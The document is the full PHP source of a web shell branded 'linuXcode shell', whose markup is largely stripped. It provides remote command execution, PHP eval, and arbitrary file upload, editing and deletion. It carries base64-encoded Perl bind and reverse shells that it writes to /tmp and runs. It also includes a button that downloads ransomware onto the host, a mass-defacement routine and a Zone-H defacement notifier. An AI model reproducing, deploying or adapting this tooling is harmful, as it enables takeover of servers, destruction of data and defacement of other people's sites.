:-[ linuXcode.org ]-:

"; echo "

^[ linuXcode shell - version 2017 ]^

"; echo ""; exit; } if( !isset($_SESSION[base64_encode($_SERVER['HTTP_HOST'])] )) if( empty($s57_paswot) || ( isset( $_POST['pass'] ) && (base64_encode($_POST['pass']) == $s57_paswot) ) ) $_SESSION[base64_encode($_SERVER['HTTP_HOST'])] = true; else shutdown57_login(); function a_cmd($command){ if(function_exists('system')){ $a_cmd=@system($command); }elseif (function_exists('exec')) { $a_cmd=@exec($command); }elseif (function_exists('shell_exec')) { $a_cmd=@shell_exec($command); }elseif (function_exists('passthru')) { $a_cmd=@passthru($command); } @ob_start(); $a_cmd.=@ob_get_contents(); return $a_cmd; } function a_upl($tmp,$file){ if(function_exists('move_uploaded_file')){ $a_upl=@move_uploaded_file($tmp,$file); }elseif (function_exists('copy')) { $a_upl=@copy($tmp,$file); } return $a_upl; } function a_getx($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } function a_fsize($files){ $size = filesize($files)/1024; $size = round($size,3); if($size > 1024) { $size = round($size/1024,2). 'MB'; } else { $size = $size. 'KB'; } return $size; } function a_own($path){ if(function_exists('posix_getpwuid')) { $downer = @posix_getpwuid(fileowner($path)); $downer = $downer['name']; } else { //$downer = $uid; $downer = fileowner($path); } return $downer; } function a_group($path){ if(function_exists('posix_getgrgid')) { $dgrp = @posix_getgrgid(filegroup($path)); $dgrp = $dgrp['name']; } else { $dgrp = filegroup($path); } return $dgrp; } function a_sperm($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function a_hdd($s) { if($s >= 1073741824) return sprintf('%1.2f',$s / 1073741824 ).' GB'; elseif($s >= 1048576) return sprintf('%1.2f',$s / 1048576 ) .' MB'; elseif($s >= 1024) return sprintf('%1.2f',$s / 1024 ) .' KB'; else return $s .' B'; } function a_download($file){ @ob_clean(); header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file).'"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); return readfile($file); exit; } function a_rmdir($d){ if(!rmdir($d)){ $s=scandir($d); foreach ($s as $ss) { if(is_file($d."/".$ss)){ if(unlink($d."/".$ss)){ rmdir($d); } } if(is_dir($d."/".$ss)){ rmdir($d."/".$ss); rmdir($d); } } } } function a_gantipass($old,$new){ $file=getcwd()."/".$_SERVER['PHP_SELF']; $getc=file_get_contents($file); $pw=str_replace("".$old."","".$new."",$getc); $fp=fopen($file,"w"); return fwrite($fp,$pw); fclose($fp); } // started alinko here if(empty($_GET['o'])&&empty($_GET['d'])){ $d=getcwd(); }else{ if(!empty($_GET['o'])){ $d=$_GET['o']; }else{ if(!empty($_GET['d'])){ if(file($_GET['d'])){ $d=dirname($_GET['d']); }else{ $d=$_GET['d']; } } } } if(function_exists('scandir')){ $s=@scandir($d); }else{ echo "

SCANDIR(); FUNCTIONS HAS BEEN DISABLED IN THIS WEBSHIT

"; } echo "linuXcode.org - ".$_SERVER['HTTP_HOST'].""; echo " "; if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $sm= ini_get('safe_mode') ? " ON" : " OFF"; $mysql= function_exists('mysql_connect')?" ON":" OFF"; $url_fp =ini_get('url_fopen')?" ON":" OFF"; $curl=function_exists('curl_init')?" ON":" OFF"; $df=ini_get('disable_functions') ? substr(ini_get('disable_functions'),0,50).",etc..." : " NONE"; echo "

SERVER SOFTWARE : ".$_SERVER['SERVER_SOFTWARE']." UNAME : ".php_uname()." HOSTNAME : ".$_SERVER['HTTP_HOST']." IP SERVER : ".gethostbyname($_SERVER['HTTP_HOST'])." \| YOUR IP : ".$_SERVER['REMOTE_ADDR']." User: ".$user." (".$uid.") Group: ".$group." (".$gid.") PHP version : ".phpversion()."-[PHPINFO] HDD Free Space: ".a_hdd(diskfreespace($d))." CURL:".$curl."\|safemode:".$sm."\|URL FOPEN:".$url_fp."\|MySQL:".$mysql." DISABLE FUNCTIONS :".$df." "; echo "	"; echo " "; echo " Home "; echo " Upload "; echo " Shell "; echo " Network "; echo " Change Password "; echo " LogOut "; echo " Mass Deface "; echo " Symlink "; echo " Zone-H "; echo " PHP "; echo " Adminer "; echo " Ransomeware "; echo "
"; echo "Current dir :"; $d=str_replace('\\','/',$d); $path = explode('/',$d); foreach($path as $id=>$curdir){ if($curdir == '' && $id == 0){ $a = true; echo '/'; continue; } if($curdir == '') continue; echo ''.$curdir.'/'; } $pwd=str_replace('\\','/',getcwd()); $a_w=(is_writable($d)) ? "#W" : "#R"; echo " ($a_w)	Go to dir :

"; echo"

"; if(@empty($_GET['f'])){ echo "

"; echo ""; echo ""; foreach ($s as $dir) { if(!is_dir("$d/$dir")||$dir=='.'||$dir=='..')continue; $a_ftype=@mime_content_type ("$d/$dir"); $a_fdm=@date("D m Y g:i:s", filemtime("$d/$dir")); $a_own=@a_own("$d/$dir"); $a_gro=@a_group("$d/$dir"); $a_sperm=@a_sperm("$d/$dir"); echo ""; echo ""; echo ""; } foreach ($s as $fil) { if(!is_file("$d/$fil")||$fil=='.'||$fil=='..')continue; $a_fsize=@a_fsize("$d/$fil"); $a_ftype=@mime_content_type("$d/$fil"); $a_fdm=@date("D m Y g:i:s", filemtime("$d/$fil")); $a_own=@a_own("$d/$fil"); $a_gro=@a_group("$d/$fil"); $a_sperm=@a_sperm("$d/$fil"); echo ""; echo ""; echo ""; } echo ""; echo "

^	Name	Size	Type	Date Modified	Own:Group	Permission	Actions
@	..	#!	#!	#!	#!	#!	newDir / newFiles
	".$dir."	--	".$a_ftype."	".$a_fdm."	".$a_own.":".$a_gro."	".$a_sperm."	"; echo "rename / delete"; echo "
	".$fil."	".$a_fsize."	".$a_ftype."	".$a_fdm."	".$a_own.":".$a_gro."	".$a_sperm."	"; echo "rename / edit / delete / dl"; echo "
"; echo " "; echo"

"; if(isset($_POST['sbmt'])){ $file=$_POST['cekf']; $dir=$_POST['cekd']; if($_POST['select']=='del'){ if($_POST['cekf']){ foreach ($file as $cekf) { if(unlink($cekf)){ echo""; } } } if($_POST['cekd']){ foreach ($dir as $cekd) { if(a_rmdir($cekd)){ echo""; } }} }elseif ($_POST['select']=='copy') { $_SESSION['copy']=$_POST['cekf']; echo ""; }elseif ($_POST['select']=='unzip') { $uz=$_POST['cekf']; foreach($uz as $unzip){ system('unzip '.$unzip); } }elseif ($_POST['select']=='tar') { $tar=$_POST['cekf']; foreach($tar as $gz){ system('tar -xvf '.$gz); } } } }else{ $a_f=$_GET['f']; if($a_f == "vf"){ $a_ctext="

".htmlspecialchars(file_get_contents($_GET['d']))."

"; if (preg_match("/text/",mime_content_type($_GET['d']))) { echo $a_ctext; }else{ a_download($_GET['d']); } }elseif ($a_f == "dl") { a_download($_GET['d']); }elseif ($a_f == "rename") { echo ""; if (isset($_POST['srename'])) { if(rename(urldecode($_GET['d']),dirname($_GET['d'])."/".htmlspecialchars($_POST['rename']))){ echo ""; }else{ echo " PERMISSION DENIED "; } } }elseif ($a_f == "edit") { echo ""; if(isset($_POST['sf'])){ $f=@fopen($_POST['fname'],"w"); if (@fwrite($f,$_POST['fedit'])) { echo ""; }else{ echo " PERMISSION DENIED "; } } }elseif ($a_f == "rm") { if(unlink($_GET['d'])){ echo ""; }else{ echo " PERMISSION DENIED "; } }elseif ($a_f == "rmdir") { if(@a_rmdir($_GET['d'])){ echo ""; }else{ echo ""; } }elseif ($a_f == "mkdir") { echo ""; if(isset($_POST['sf'])){ if(@mkdir($_POST['nfolder'])){ echo ""; }else{ echo " PERMISSION DENIED "; } } }elseif ($a_f == "newfile") { echo ""; if (isset($_POST['sf'])) { $f=@fopen($_GET['d']."/".$_POST['fname'],"w"); if(@fwrite($f,$_POST['fedit'])){ echo ""; }else{ echo " PERMISSION DENIED "; } } }elseif ($a_f == "upl") { $a_w_r=(is_writable(getcwd())) ? "".getcwd()."" : "".getcwd().""; $a_w_d=(is_writable($_GET['d'])) ? "".$_GET['d']."" : "".$_GET['d'].""; echo ""; echo ""; echo "

Upload to : "; echo " ".$a_w_r.""; echo "".$a_w_d."

"; if(!empty($_FILES['ufile']['tmp_name'])){ $a_diru=$_POST['droot']."/".$_FILES['ufile']['name']; if(a_upl($_FILES['ufile']['tmp_name'],$a_diru)){ echo ""; echo "Uploaded to -> ".$a_diru.""; }else{ echo "Can't Upload files~~"; } } }elseif ($a_f == "sh") { $a_val=(empty($_POST['cmd'])) ? "" : $_POST['cmd']; echo "

"; if(isset($_POST['cmd'])){ if(preg_match("/^cd/",$_POST['cmd'])){ $a_direct=explode(" ",$_POST['cmd']); echo ""; }else{ echo "

";
			@a_cmd($_POST['cmd']);
		    echo "

"; } } }elseif ($a_f == "net") { echo "

"; echo ""; echo "

Bind Port: PORT:
Back Connect: Server:	PORT:

"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; if(isset($_POST['sub_bp'])) { $f_bp = fopen("/tmp/bp.pl", "w"); fwrite($f_bp, base64_decode($bind_port_p)); fclose($f_bp); $port = $_POST['port_bind']; $out = @a_cmd("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &"); sleep(1); echo "

".$out."\n".a_cmd("ps aux | grep bp.pl")."

"; unlink("/tmp/bp.pl"); } $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; if(isset($_POST['sub_bc'])) { $f_bc = fopen("/tmp/bc.pl", "w"); fwrite($f_bc, base64_decode($back_connect_p)); fclose($f_bc); $ipbc = $_POST['ip_bc']; $port = $_POST['port_bc']; $out = a_cmd("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &"); sleep(1); echo "

".$out."\n".a_cmd("ps aux | grep bc.pl")."

"; unlink("/tmp/bc.pl"); } }elseif ($a_f == "out") { session_destroy(); echo ""; }elseif ($a_f == "copy") { $kopi=$_SESSION['copy']; echo ""; if(isset($_POST['sbmt'])){ $kopi=$_POST['kopi']; $dst=$_POST['dst']; foreach($kopi as $copi){ $kopied=$dst."/".basename($copi); if(copy($copi,$kopied)){ echo " $copi COPIED TO $kopied
"; } } } }elseif ($a_f == "phpinfo") { @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"")+6; $akhir = strpos($buff,""); echo "

".substr($buff,$awal,$akhir-$awal)."

"; }elseif ($a_f == "cp") { if(empty($_POST['change'])){ echo "

Change Password

"; echo ""; echo "New password
"; echo "Confirm password
"; echo "

"; }else{ if($_POST['new']==$_POST['neww']){ if(a_gantipass($_POST['old'],base64_encode($_POST['new']))){ echo ""; }else{ echo ""; } }else{ echo ""; } } }elseif ($a_f == "sym") { if(!file_exists('linuXcode.org')){ if(function_exists('system')){ system('ln -s / linuXcode.org'); echo "

Created Symbolic Link Done!

Klik Disini Mhanx"; } else{ echo "
FUNCTION SYSTEM() NOT FOUND IN THIS SERVER"; } }else{ echo "
Symbolic Link Created in here
"; echo "REMOVE Symbolic Link"; } }elseif ($a_f == "rmsym") { system('rm -rf linuXcode.org'); echo""; }elseif ($a_f == "php") { echo "
PHP EVAL

"; if(isset($_POST['php_e'])){ echo "
"; @eval($_POST['php_e']); } }elseif ($a_f == "rsmw") { if(a_getx("https://raw.githubusercontent.com/bug7sec/Ransomware/master/v2/AwesomeWare.php","AwesomeWare.php")){ echo "
AwesomeWare Created!
"; echo "
Click here
"; }else{ echo "
Can't Create Ransomware
"; } }elseif ($a_f == "adm") { if(a_getx("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")){ echo "
Adminer Created !
"; echo "
Click Here
"; }else{ echo "
Can't Create Adminer
"; } }elseif ($a_f == "mas") { echo'
Mass deface
Original Script by indoXploit '; function sabun_massal($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $lokasi
"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc,$namafile,$isi_script); } } } } } } function sabun_biasa($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $dirb/$namafile
"; file_put_contents($lokasi, $isi_script); } } } } } } if($_POST['start']) { if($_POST['tipe_sabun'] == 'mahal') { echo "
"; sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "
"; } elseif($_POST['tipe_sabun'] == 'murah') { echo "
"; sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "
"; } } else { echo ""; echo "
Tipe Sabun:
BiasaMassal
Folder:

Filename:

Index File:
JAYALAH INDONESIAKU

"; } }elseif ($a_f == "zh") { echo"
Zone-H Mass Notifer
"; echo "
"; echo "
"; echo "
"; echo "
"; $url = explode("\r\n", $_POST['url']); $go = $_POST['go']; function kirim($target,$hacker) { $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_URL, "http://zone-h.org/notify/single"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array( "defacer" => $hacker, "domain1" => $target, "hackmode" => "1", "reason" => "1", )); $res = curl_exec($ch); curl_close($ch); return preg_match("/OK<\/font><\/li>/", $res); } if($go) { foreach($url as $sites) { if(kirim($sites,$_POST['depecer'])) { echo "
[ OK ] => $sites
"; } else { echo "
[ ERROR ] => $sites
"; } } } } } echo "
copyright © ".date('Y')." linuXcode.org - alinko
";